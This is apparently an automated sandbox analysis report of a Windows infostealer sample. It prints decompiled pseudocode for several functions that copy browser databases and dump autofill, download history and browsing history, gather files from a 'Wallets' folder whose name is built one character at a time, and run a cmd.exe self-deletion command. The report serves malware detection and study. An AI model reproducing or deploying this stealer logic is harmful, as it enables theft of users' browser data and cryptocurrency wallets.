Opcode ID: b81f7566ead81b30d7428238ac4451f34e394cc1b6b459c63c7db9aa73303d81
Instruction ID: 1b8d8847f39b5dc4df90a0ae22ff8d0ca56b7b3b4b154549ba5429b0e5fee44c
Opcode Fuzzy Hash: b81f7566ead81b30d7428238ac4451f34e394cc1b6b459c63c7db9aa73303d81
Instruction Fuzzy Hash: C4417276D4021CABDB20DBE0DC4AEE97B7CBF0D354F1408BAB615D2060D774968A8F58

Uniqueness

Uniqueness Score: -1.00%

Function 004109CC Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137
stringmemoryfileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E004109CC(CHAR* __ecx, CHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				char _v276;
				char _v540;
				CHAR* _v544;
				char _v548;
				char _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t37;
				void* _t46;
				void* _t58;
				int _t60;
				void* _t63;
				void* _t67;
				void* _t68;
				intOrPtr _t69;
				CHAR* _t70;
				void* _t89;
				signed int _t93;
				void* _t94;
				void* _t97;
				void* _t98;
				void* _t101;

				_t37 =  *0x444664; // 0xfa3a0753
				_v8 = _t37 ^ _t93;
				_v544 = _a4;
				_v556 = _a8;
				_v560 = _a12;
				_t81 = __ecx;
				E0041F6B0( &_v276, 0, 0x104);
				 *0x4474e0( &_v276,  *0x447058);
				_t46 = 0x1a;
				 *0x4474e0( &_v276, E00417BB8(_t46, _t101));
				CopyFileA(_t81,  &_v276, 1); // executed
				E0041F6B0( &_v540, 0, 0x104);
				wsprintfA( &_v540, "\\Downloads\\%s_%s.txt", _v556, _v544);
				_t92 =  *0x447240; // 0x6e8cd0
				_t58 =  *0x447304( &_v276,  &_v552); // executed
				_t97 = _t94 + 0x30;
				if(_t58 == 0) {
					_t63 =  *0x4472b8(_v552, _t92, 0xffffffff,  &_v548, 0); // executed
					_t98 = _t97 + 0x14;
					if(_t63 == 0) {
						_t67 = RtlAllocateHeap(GetProcessHeap(), 0, 0xf423f); // executed
						_v544 = _t67;
						while(1) {
							_t68 =  *0x4472d4(_v548); // executed
							if(_t68 != 0x64) {
								break;
							}
							_t69 =  *0x4472f4(_v548, 0);
							_t92 = _t69;
							_t70 =  *0x4472f4(_v548, 1);
							_t98 = _t98 + 0x10;
							_t81 = _t70;
							 *0x4474e0(_v544, _t69);
							 *0x4474e0(_v544, "\n");
							 *0x4474e0(_v544, _t70);
							 *0x4474e0(_v544, "\n\n");
						}
						E0041EAE0(_v560,  &_v540, lstrlenA(_v544), 3);
						E0041F6B0( &_v544, 0, 4);
					}
					 *0x4472d8(_v548);
					 *0x447308(_v552); // executed
				}
				_t60 = DeleteFileA( &_v276); // executed
				return E0041F69E(_t60, _t81, _v8 ^ _t93, _t89, 0, _t92);
			}

0x004109d5
0x004109dc
0x004109e4
0x004109ee
0x004109fd
0x00410a0d
0x00410a0f
0x00410a24
0x00410a2c
0x00410a3a
0x00410a4a
0x00410a59
0x00410a79
0x00410a7f
0x00410a93
0x00410a99
0x00410a9e
0x00410ab5
0x00410abb
0x00410ac0
0x00410ad3
0x00410ad9
0x00410b3f
0x00410b45
0x00410b4f
0x00000000
0x00000000
0x00410ae8
0x00410af6
0x00410af8
0x00410afe
0x00410b08
0x00410b0a
0x00410b1b
0x00410b28
0x00410b39
0x00410b39
0x00410b73
0x00410b85
0x00410b8a
0x00410b93
0x00410ba0
0x00410ba6
0x00410bae
0x00410bc2

APIs

_memset.LIBCMT ref: 00410A0F
lstrcat.KERNEL32(?,?), ref: 00410A24

Part of subcall function 00417BB8: _malloc.LIBCMT ref: 00417BBE
Part of subcall function 00417BB8: GetTickCount.KERNEL32 ref: 00417BC9
Part of subcall function 00417BB8: _rand.LIBCMT ref: 00417BDE
Part of subcall function 00417BB8: wsprintfA.USER32 ref: 00417BF1

lstrcat.KERNEL32(?,00000000), ref: 00410A3A
CopyFileA.KERNEL32(?,?,00000001), ref: 00410A4A
_memset.LIBCMT ref: 00410A59
wsprintfA.USER32 ref: 00410A79
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00410ACC
RtlAllocateHeap.NTDLL(00000000), ref: 00410AD3
lstrcat.KERNEL32(?,00000000), ref: 00410B0A
lstrcat.KERNEL32(?,0043D130), ref: 00410B1B
lstrcat.KERNEL32(?,00000000), ref: 00410B28
lstrcat.KERNEL32(?,0043F4D8), ref: 00410B39
lstrlenA.KERNEL32(?), ref: 00410B57
_memset.LIBCMT ref: 00410B85
DeleteFileA.KERNEL32(?), ref: 00410BAE

Strings

ZHaZea, xrefs: 00410B45
\Downloads\%s_%s.txt, xrefs: 00410A73

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$_memset$FileHeapwsprintf$AllocateCopyCountDeleteProcessTick_malloc_randlstrlen
String ID: ZHaZea$\Downloads\%s_%s.txt
API String ID: 3235818882-3413542198
Opcode ID: 50755f4ab8e22bc9bd887e2443c24a583e8e052cb35b436ec90846120ad48f83
Instruction ID: 91aa2d6a5c76658a10a398ca82804f6d891facacdcacfead7c8baa22fbed6aed
Opcode Fuzzy Hash: 50755f4ab8e22bc9bd887e2443c24a583e8e052cb35b436ec90846120ad48f83
Instruction Fuzzy Hash: F851607A94411CBBCB209FA0EC4DEDA7B78FB19304F1004E6F909E2161D7749A86CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00410609 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 135
stringmemoryfileCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E00410609(CHAR* __ebx, CHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				char _v276;
				char _v540;
				CHAR* _v544;
				char _v548;
				char _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				void* __edi;
				void* __esi;
				signed int _t37;
				void* _t46;
				void* _t58;
				int _t60;
				void* _t63;
				void* _t67;
				void* _t92;
				intOrPtr _t95;
				signed int _t96;
				void* _t104;

				_t81 = __ebx;
				_t37 =  *0x444664; // 0xfa3a0753
				_v8 = _t37 ^ _t96;
				_v544 = _a4;
				_v556 = _a8;
				_v560 = _a12;
				E0041F6B0( &_v276, 0, 0x104);
				 *0x4474e0( &_v276,  *0x447058);
				_t46 = 0x1a;
				 *0x4474e0( &_v276, E00417BB8(_t46, _t104));
				CopyFileA(__ebx,  &_v276, 1); // executed
				E0041F6B0( &_v540, 0, 0x104);
				wsprintfA( &_v540, "\\Autofill\\%s_%s.txt", _v556, _v544);
				_t95 =  *0x447184; // 0x6e8ca0
				_t58 =  *0x447304( &_v276,  &_v552); // executed
				if(_t58 == 0) {
					_t63 =  *0x4472b8(_v552, _t95, 0xffffffff,  &_v548, 0); // executed
					if(_t63 == 0) {
						_t67 = RtlAllocateHeap(GetProcessHeap(), 0, 0xf423f); // executed
						_v544 = _t67;
						while(1) {
							_push(_v548);
							if( *0x4472d4() != 0x64) {
								break;
							}
							 *0x4474e0(_v544,  *0x4472f4(_v548, 0));
							 *0x4474e0(_v544, " ");
							 *0x4474e0(_v544,  *0x4472f4(_v548, 1));
							 *0x4474e0(_v544, "\n");
						}
						E0041EAE0(_v560,  &_v540, lstrlenA(_v544), 3);
						E0041F6B0( &_v544, 0, 4);
					}
					 *0x4472d8(_v548);
					 *0x447308(_v552); // executed
				}
				_t60 = DeleteFileA( &_v276); // executed
				return E0041F69E(_t60, _t81, _v8 ^ _t96, _t92, 0, _t95);
			}

0x00410609
0x00410612
0x00410619
0x00410620
0x0041062a
0x00410639
0x00410649
0x0041065e
0x00410666
0x00410674
0x00410684
0x00410693
0x004106b3
0x004106b9
0x004106cd
0x004106d8
0x004106ef
0x004106fa
0x0041070d
0x00410713
0x00410776
0x00410776
0x00410786
0x00000000
0x00000000
0x00410731
0x00410742
0x0041075f
0x00410770
0x00410770
0x004107aa
0x004107bc
0x004107c1
0x004107ca
0x004107d7
0x004107dd
0x004107e5
0x004107f8

APIs

_memset.LIBCMT ref: 00410649
lstrcat.KERNEL32(?), ref: 0041065E

Part of subcall function 00417BB8: _malloc.LIBCMT ref: 00417BBE
Part of subcall function 00417BB8: GetTickCount.KERNEL32 ref: 00417BC9
Part of subcall function 00417BB8: _rand.LIBCMT ref: 00417BDE
Part of subcall function 00417BB8: wsprintfA.USER32 ref: 00417BF1

lstrcat.KERNEL32(?,00000000), ref: 00410674
CopyFileA.KERNEL32(?,?,00000001), ref: 00410684
_memset.LIBCMT ref: 00410693
wsprintfA.USER32 ref: 004106B3
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00410706
RtlAllocateHeap.NTDLL(00000000), ref: 0041070D
lstrcat.KERNEL32(?,00000000), ref: 00410731
lstrcat.KERNEL32(?,0043F778), ref: 00410742
lstrcat.KERNEL32(?,00000000), ref: 0041075F
lstrcat.KERNEL32(?,0043D130), ref: 00410770
lstrlenA.KERNEL32(?), ref: 0041078E
_memset.LIBCMT ref: 004107BC
DeleteFileA.KERNEL32(?), ref: 004107E5

Strings

ZHaZea, xrefs: 0041077C
\Autofill\%s_%s.txt, xrefs: 004106AD

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$_memset$FileHeapwsprintf$AllocateCopyCountDeleteProcessTick_malloc_randlstrlen
String ID: ZHaZea$\Autofill\%s_%s.txt
API String ID: 3235818882-2263976030
Opcode ID: 09c4457b9b47ebef8a596946dca7775b5c1f4e52b30401bb68740f96077b9649
Instruction ID: 5c961ee7c8ec14e07a965b7cd7942f4aaf22ac12fe70423a131e304ee3442d48
Opcode Fuzzy Hash: 09c4457b9b47ebef8a596946dca7775b5c1f4e52b30401bb68740f96077b9649
Instruction Fuzzy Hash: 6E515076844118BBCB219FA0EC4DEEA7B78FB19314F1004E6F509E2161DB745A86CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00418094 Relevance: 29.8, APIs: 12, Strings: 5, Instructions: 74
stringCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E00418094() {
				intOrPtr* _t37;
				void* _t50;
				intOrPtr _t52;
				void* _t55;
				void* _t56;
				void* _t58;
				void* _t60;

				E00423679(E00433270, _t50, _t56, _t58);
				E0041F6B0(_t60 - 0x114, 0, 0x104);
				E0041F6B0(_t60 - 0x16c, 0, 0x3c);
				 *0x4474e0(_t60 - 0x114, "/c ", 0x160);
				 *0x4474e0(_t60 - 0x114, "timeout /t 6 & del /f /q \"");
				_t37 = E00417EF5(_t60 - 0x130, _t55, 0x104, GetCurrentProcessId()); // executed
				 *(_t60 - 4) = 0;
				if( *((intOrPtr*)(_t37 + 0x14)) >= 0x10) {
					_t37 =  *_t37;
				}
				 *0x4474e0(_t60 - 0x114, _t37);
				 *(_t60 - 4) =  *(_t60 - 4) | 0xffffffff;
				E00404A66(_t60 - 0x130, 1, 0);
				 *0x4474e0(_t60 - 0x114, "\" & exit");
				_t52 = 0x3c;
				 *((intOrPtr*)(_t60 - 0x158)) = _t60 - 0x114;
				 *((intOrPtr*)(_t60 - 0x16c)) = _t52;
				 *((intOrPtr*)(_t60 - 0x168)) = 0;
				 *((intOrPtr*)(_t60 - 0x164)) = 0;
				 *(_t60 - 0x160) = "open";
				 *(_t60 - 0x15c) = "C:\\Windows\\System32\\cmd.exe";
				 *((intOrPtr*)(_t60 - 0x154)) = 0;
				 *((intOrPtr*)(_t60 - 0x150)) = 0;
				 *((intOrPtr*)(_t60 - 0x14c)) = 0;
				 *0x447544(_t60 - 0x16c); // executed
				E0041F6B0(_t60 - 0x16c, 0, _t52);
				E0041F6B0(_t60 - 0x114, 0, 0x104);
				ExitProcess(0);
			}

0x0041809e
0x004180b3
0x004180c2
0x004180d6
0x004180e8
0x004180fb
0x00418101
0x00418108
0x0041810a
0x0041810a
0x00418114
0x0041811a
0x00418127
0x00418138
0x00418146
0x00418147
0x00418154
0x0041815a
0x00418160
0x00418166
0x00418170
0x0041817a
0x00418180
0x00418186
0x0041818c
0x0041819b
0x004181a9
0x004181b2

APIs

__EH_prolog3_GS.LIBCMT ref: 0041809E
_memset.LIBCMT ref: 004180B3
_memset.LIBCMT ref: 004180C2
lstrcat.KERNEL32(?,/c ), ref: 004180D6
lstrcat.KERNEL32(?,timeout /t 6 & del /f /q "), ref: 004180E8
GetCurrentProcessId.KERNEL32(?,?,?,?,00000160,0040CCB3,?,?,?,?,00000000), ref: 004180EE

Part of subcall function 00417EF5: OpenProcess.KERNEL32(00000410,00000000,00000010,?), ref: 00417F1B
Part of subcall function 00417EF5: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00417F36
Part of subcall function 00417EF5: CloseHandle.KERNEL32(00000000), ref: 00417F3D

lstrcat.KERNEL32(?,00000000), ref: 00418114
lstrcat.KERNEL32(?," & exit), ref: 00418138
ShellExecuteEx.SHELL32 ref: 0041818C
_memset.LIBCMT ref: 0041819B
_memset.LIBCMT ref: 004181A9
ExitProcess.KERNEL32 ref: 004181B2

Strings

/c , xrefs: 004180CA
timeout /t 6 & del /f /q ", xrefs: 004180DC
C:\Windows\System32\cmd.exe, xrefs: 00418170
" & exit, xrefs: 0041812C
open, xrefs: 00418166

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: _memsetlstrcat$Process$CloseCurrentExecuteExitFileH_prolog3_HandleModuleNameOpenShell
String ID: " & exit$/c $C:\Windows\System32\cmd.exe$open$timeout /t 6 & del /f /q "
API String ID: 1639516384-2288348620
Opcode ID: 5fa00dd878f96c65c9751bd24df13cf936ef39ed36b33aaa10c8c6b50fbc5b0b
Instruction ID: ff18c51f70d2d52823d12ed2c6d30f6ff4e29097120591ba7a5afa0b4fad5a47
Opcode Fuzzy Hash: 5fa00dd878f96c65c9751bd24df13cf936ef39ed36b33aaa10c8c6b50fbc5b0b
Instruction Fuzzy Hash: 61313072D00228ABDB20DF95DD49ACABBBCAF09715F1000E7B208E6151D7784B85CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00408D57 Relevance: 27.1, APIs: 18, Instructions: 125memorystringCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0000EA60), ref: 00408D66
HeapAlloc.KERNEL32(00000000), ref: 00408D6D
lstrcat.KERNEL32(00000000,?), ref: 00408D79
_strtok_s.LIBCMT ref: 00408D8F
StrCmpCA.SHLWAPI(00000000,0043F340), ref: 00408DD1
StrCmpCA.SHLWAPI(00000000,0043F340), ref: 00408DED
StrCmpCA.SHLWAPI(00000000,0043F340), ref: 00408E09
StrCmpCA.SHLWAPI(00000000,0043F340), ref: 00408E25
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408E45
RtlAllocateHeap.NTDLL(00000000), ref: 00408E4C
StrCmpCA.SHLWAPI(00000000,0043F340), ref: 00408E5B
StrCmpCA.SHLWAPI(00000000,0043F340), ref: 00408E70
StrCmpCA.SHLWAPI(00000000,0043F340), ref: 00408E85
StrCmpCA.SHLWAPI(00000000,0043F340), ref: 00408E9A
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408EB0
RtlAllocateHeap.NTDLL(00000000), ref: 00408EB7
lstrcat.KERNEL32(00000000,00000000), ref: 00408EC4
_strtok_s.LIBCMT ref: 00408ED4

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$Allocate_strtok_slstrcat$Alloc
String ID:
API String ID: 407900623-0
Opcode ID: 87e4ed38acb466d9ad02ebd2581a74ff37ad70c2d63fdf5582eb1f4857aa3699
Instruction ID: 316c5ed0a08ab371e1929ba513352a1576728f45b127044d8c3dd872fa1df4ea
Opcode Fuzzy Hash: 87e4ed38acb466d9ad02ebd2581a74ff37ad70c2d63fdf5582eb1f4857aa3699
Instruction Fuzzy Hash: 4741D674908124EAD7115B64ED08B7B3E7CEB23357F11487AF446E6190EB78854387AA

Uniqueness

Uniqueness Score: -1.00%

Function 004107FB Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 125
stringmemoryfileCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E004107FB(CHAR* __ebx, CHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				char _v276;
				char _v540;
				CHAR* _v544;
				char _v548;
				char _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				void* __edi;
				void* __esi;
				signed int _t35;
				void* _t44;
				void* _t56;
				int _t58;
				void* _t61;
				void* _t65;
				void* _t68;
				void* _t84;
				signed int _t87;
				void* _t88;
				void* _t91;
				void* _t92;
				void* _t95;

				_t77 = __ebx;
				_t35 =  *0x444664; // 0xfa3a0753
				_v8 = _t35 ^ _t87;
				_v544 = _a4;
				_v556 = _a8;
				_v560 = _a12;
				E0041F6B0( &_v276, 0, 0x104);
				 *0x4474e0( &_v276,  *0x447058);
				_t44 = 0x1a;
				 *0x4474e0( &_v276, E00417BB8(_t44, _t95));
				CopyFileA(__ebx,  &_v276, 1); // executed
				E0041F6B0( &_v540, 0, 0x104);
				wsprintfA( &_v540, "\\History\\%s_%s.txt", _v556, _v544);
				_t56 =  *0x447304( &_v276,  &_v552); // executed
				_t91 = _t88 + 0x30;
				if(_t56 == 0) {
					_t61 =  *0x4472b8(_v552,  *0x446e80, 0xffffffff,  &_v548, 0); // executed
					_t92 = _t91 + 0x14;
					if(_t61 == 0) {
						_t65 = RtlAllocateHeap(GetProcessHeap(), 0, 0xf423f); // executed
						_v544 = _t65;
						while(1) {
							_push(_v548);
							if( *0x4472d4() != 0x64) {
								break;
							}
							 *0x4472f4(_v548, 0);
							_t68 =  *0x4472f4(_v548, 0);
							_t92 = _t92 + 0x10;
							 *0x4474e0(_v544, _t68);
							 *0x4474e0(_v544, "\n");
						}
						E0041EAE0(_v560,  &_v540, lstrlenA(_v544), 3);
						E0041F6B0( &_v544, 0, 4);
					}
					 *0x4472d8(_v548);
					 *0x447308(_v552); // executed
				}
				_t58 = DeleteFileA( &_v276); // executed
				return E0041F69E(_t58, _t77, _v8 ^ _t87, _t84, 0, 0x104);
			}

0x004107fb
0x00410804
0x0041080b
0x00410812
0x0041081c
0x0041082b
0x0041083b
0x00410850
0x00410858
0x00410866
0x00410876
0x00410885
0x004108a5
0x004108b9
0x004108bf
0x004108c4
0x004108e0
0x004108e6
0x004108eb
0x004108fe
0x00410904
0x00410947
0x00410947
0x00410957
0x00000000
0x00000000
0x00410913
0x00410920
0x00410926
0x00410930
0x00410941
0x00410941
0x0041097b
0x0041098d
0x00410992
0x0041099b
0x004109a8
0x004109ae
0x004109b6
0x004109c9

APIs

_memset.LIBCMT ref: 0041083B
lstrcat.KERNEL32(?), ref: 00410850

Part of subcall function 00417BB8: _malloc.LIBCMT ref: 00417BBE
Part of subcall function 00417BB8: GetTickCount.KERNEL32 ref: 00417BC9
Part of subcall function 00417BB8: _rand.LIBCMT ref: 00417BDE
Part of subcall function 00417BB8: wsprintfA.USER32 ref: 00417BF1

lstrcat.KERNEL32(?,00000000), ref: 00410866
CopyFileA.KERNEL32(?,?,00000001), ref: 00410876
_memset.LIBCMT ref: 00410885
wsprintfA.USER32 ref: 004108A5
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 004108F7
RtlAllocateHeap.NTDLL(00000000), ref: 004108FE
lstrcat.KERNEL32(?,00000000), ref: 00410930
lstrcat.KERNEL32(?,0043D130), ref: 00410941
lstrlenA.KERNEL32(?), ref: 0041095F
_memset.LIBCMT ref: 0041098D
DeleteFileA.KERNEL32(?), ref: 004109B6

Strings

ZHaZea, xrefs: 0041094D
\History\%s_%s.txt, xrefs: 0041089F

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$_memset$FileHeapwsprintf$AllocateCopyCountDeleteProcessTick_malloc_randlstrlen
String ID: ZHaZea$\History\%s_%s.txt
API String ID: 3235818882-3585377772
Opcode ID: 8d07d805f823b9e0ec7554a6071a8b19e1aa5a0710626b222514f5bb1ff752cd
Instruction ID: fd3b2ead0f457a35cc92b7f5b3cf035a9fcef686339a174f92d89164cb09ff95
Opcode Fuzzy Hash: 8d07d805f823b9e0ec7554a6071a8b19e1aa5a0710626b222514f5bb1ff752cd
Instruction Fuzzy Hash: C541607684011CBBCB21AFA4EC4DEDA7B78FB19304F1004E5F909E2161D7749A95CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040D114 Relevance: 24.4, APIs: 16, Instructions: 352
stringCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0040D114(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t145;
				intOrPtr _t149;
				void* _t161;
				void* _t164;
				void* _t166;
				void* _t173;
				void* _t176;
				void* _t178;
				WCHAR* _t179;
				signed char _t180;
				intOrPtr _t205;
				intOrPtr* _t212;
				intOrPtr* _t223;
				void* _t233;
				void* _t235;
				intOrPtr _t245;
				intOrPtr _t259;
				char* _t304;
				void* _t319;
				void* _t320;
				intOrPtr _t321;
				void* _t322;

				_t309 = __esi;
				_t294 = __edi;
				_t247 = __ebx;
				_push(0x260);
				E00423679(E00434159, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t319 - 0x258)) =  *((intOrPtr*)(_t319 + 8));
				 *((intOrPtr*)(_t319 - 4)) = 0;
				 *((intOrPtr*)(_t319 - 0x120)) = 0xf;
				 *((intOrPtr*)(_t319 - 0x124)) = 0;
				 *((char*)(_t319 - 0x134)) = 0;
				 *((char*)(_t319 - 4)) = 3;
				_t324 =  *((intOrPtr*)(_t319 + 0xc));
				if( *((intOrPtr*)(_t319 + 0xc)) == 0) {
					_push(0x1a);
				} else {
					_push(0x1c);
				}
				_t310 = E004181BE(_t247, _t294, _t309);
				E00404AAA(_t319 - 0x134, _t324, _t140, E004201E0(_t140));
				_push(_t319 - 0x134);
				_push(_t319 - 0x1dc);
				_t295 = _t319 + 0x10;
				_t145 = E0040CF4F(_t247, _t319 + 0x10, _t140, _t324);
				_t321 = _t320 - 0x14;
				 *((char*)(_t319 - 4)) = 4;
				_t293 = _t319 + 0x48;
				 *((intOrPtr*)(_t319 - 0x25c)) = _t321;
				E0040E6BA(_t145, _t145, _t321, _t319 + 0x48);
				E00417F60(_t319 - 0x26c, _t319 + 0x10, _t310, _t324); // executed
				 *((char*)(_t319 - 4)) = 6;
				E00404A66(_t319 - 0x1dc, 1, 0);
				_t149 =  *((intOrPtr*)(_t319 - 0x268));
				_t259 =  *((intOrPtr*)(_t319 - 0x26c));
				 *((intOrPtr*)(_t319 - 0x25c)) = _t149;
				 *((intOrPtr*)(_t319 - 0x254)) = _t259;
				_t325 = _t259 - _t149;
				if(_t259 != _t149) {
					do {
						E0040E3DA(_t319 - 0x16c,  *((intOrPtr*)(_t319 - 0x254)));
						 *((char*)(_t319 - 4)) = 7;
						_t161 = E00417D3E(_t319 - 0x16c, _t293, _t319 - 0x230);
						_push(_t319 - 0x134);
						_push(_t319 - 0x214);
						 *((char*)(_t319 - 4)) = 8;
						_t164 = E0040CF4F(0, _t319 + 0x10, _t161, _t325);
						 *((char*)(_t319 - 4)) = 9;
						_t166 = E00404DE3(_t161, _t164, _t319 - 0x24c);
						 *((char*)(_t319 - 4)) = 0xa;
						 *((intOrPtr*)(_t319 - 0x1ac)) = 0xf;
						 *((intOrPtr*)(_t319 - 0x1b0)) = 0;
						 *((char*)(_t319 - 0x1c0)) = 0;
						E00404A22(_t319 - 0x1c0, _t166);
						E00404A66(_t319 - 0x24c, 1, 0);
						E00404A66(_t319 - 0x214, 1, 0);
						 *((char*)(_t319 - 4)) = 0xe;
						E00404A66(_t319 - 0x230, 1, 0);
						_t173 = E00417D3E(_t319 - 0x16c, _t293, _t319 - 0x150);
						_push(_t319 - 0x134);
						_push(_t319 - 0x1a4);
						 *((char*)(_t319 - 4)) = 0xf;
						_t176 = E0040CF4F(0, _t319 + 0x10, _t173, _t325);
						 *((char*)(_t319 - 4)) = 0x10;
						_t178 = E00404DE3(_t173, _t176, _t319 - 0x188);
						 *((char*)(_t319 - 4)) = 0x11;
						_t179 = E00417DAA(_t178, _t319 - 0x1f8);
						if(_t179[0xa] >= 8) {
							_t179 =  *_t179;
						}
						_t180 = GetFileAttributesW(_t179); // executed
						if(_t180 == 0xffffffff) {
							L8:
							 *((intOrPtr*)(_t319 - 0x250)) = 0;
						} else {
							 *((intOrPtr*)(_t319 - 0x250)) = 1;
							if((_t180 & 0x00000010) != 0) {
								goto L8;
							}
						}
						E0040CE40(0, _t319 - 0x1f8, 1);
						E00404A66(_t319 - 0x188, 1, 0);
						E00404A66(_t319 - 0x1a4, 1, 0);
						 *((char*)(_t319 - 4)) = 0xe;
						E00404A66(_t319 - 0x150, 1, 0);
						if( *((intOrPtr*)(_t319 - 0x250)) != 0) {
							_t245 =  *((intOrPtr*)(_t319 - 0x258));
							 *((intOrPtr*)(_t245 + 0x1c)) =  *((intOrPtr*)(_t245 + 0x1c)) + 1;
							 *0x4472b4 =  *0x4472b4 +  *((intOrPtr*)(_t245 + 0x1c));
							 *0x4472a0 =  *0x4472a0 + 1;
						}
						E0041F6B0(_t319 - 0x118, 0, 0x104);
						_t322 = _t321 + 0xc;
						_t304 = "\\";
						 *0x4474e0(_t319 - 0x118, _t304);
						 *0x4474e0(_t319 - 0x118, "W");
						 *0x4474e0(_t319 - 0x118, "a");
						 *0x4474e0(_t319 - 0x118, "l");
						 *0x4474e0(_t319 - 0x118, "l");
						 *0x4474e0(_t319 - 0x118, "e");
						 *0x4474e0(_t319 - 0x118, "t");
						 *0x4474e0(_t319 - 0x118, "s");
						 *0x4474e0(_t319 - 0x118, _t304);
						_t205 =  *((intOrPtr*)(_t319 + 0x2c));
						if( *((intOrPtr*)(_t319 + 0x40)) < 0x10) {
							_t205 = _t319 + 0x2c;
						}
						 *0x4474e0(_t319 - 0x118, _t205);
						 *0x4474e0(_t319 - 0x118, _t304);
						_t212 = E00417D3E(_t319 - 0x16c, _t293, _t319 - 0x150);
						 *((char*)(_t319 - 4)) = 0x12;
						_t332 =  *((intOrPtr*)(_t212 + 0x14)) - 0x10;
						if( *((intOrPtr*)(_t212 + 0x14)) >= 0x10) {
							_t212 =  *_t212;
						}
						 *0x4474e0(_t319 - 0x118, _t212);
						 *((char*)(_t319 - 4)) = 0xe;
						E00404A66(_t319 - 0x150, 1, 0);
						 *((intOrPtr*)(_t319 - 0x250)) = E00417D3E(_t319 - 0x16c, _t293, _t319 - 0x188);
						_push(_t319 - 0x134);
						_push(_t319 - 0x1a4);
						 *((char*)(_t319 - 4)) = 0x13;
						_t280 = E0040CF4F(0, _t319 + 0x10, 1, _t332);
						 *((char*)(_t319 - 4)) = 0x14;
						_t223 = E00404DE3( *((intOrPtr*)(_t319 - 0x250)), _t221, _t319 - 0x150);
						 *((char*)(_t319 - 4)) = 0x15;
						_t333 =  *((intOrPtr*)(_t223 + 0x14)) - 0x10;
						if( *((intOrPtr*)(_t223 + 0x14)) >= 0x10) {
							_t223 =  *_t223;
						}
						E0041803D(_t280, _t223); // executed
						E00404A66(_t319 - 0x150, 1, 0);
						E00404A66(_t319 - 0x1a4, 1, 0);
						 *((char*)(_t319 - 4)) = 0xe;
						E00404A66(_t319 - 0x188, 1, 0);
						 *((intOrPtr*)(_t319 - 0x250)) = E00417D3E(_t319 - 0x16c, _t293, _t319 - 0x188);
						_push(_t319 - 0x134);
						_push(_t319 - 0x1a4);
						 *((char*)(_t319 - 4)) = 0x16;
						_t233 = E0040CF4F(0, _t319 + 0x10, 1, _t333);
						 *((char*)(_t319 - 4)) = 0x17;
						_t235 = E00404DE3( *((intOrPtr*)(_t319 - 0x250)), _t233, _t319 - 0x150);
						 *((char*)(_t319 - 4)) = 0x18;
						if( *((intOrPtr*)(_t235 + 0x14)) < 0x10) {
						}
						_t293 = _t319 - 0x118;
						E0041EAE0( *((intOrPtr*)( *((intOrPtr*)(_t319 - 0x258)) + 0x20)), _t319 - 0x118, 0, 2); // executed
						_t321 = _t322 + 0xc;
						E00404A66(_t319 - 0x150, 1, 0);
						E00404A66(_t319 - 0x1a4, 1, 0);
						E00404A66(_t319 - 0x188, 1, 0);
						E00404A66(_t319 - 0x1c0, 1, 0);
						_t295 = 0;
						 *((char*)(_t319 - 4)) = 6;
						E0040CE40(0, _t319 - 0x16c, 1);
						 *((intOrPtr*)(_t319 - 0x254)) =  *((intOrPtr*)(_t319 - 0x254)) + 0x1c;
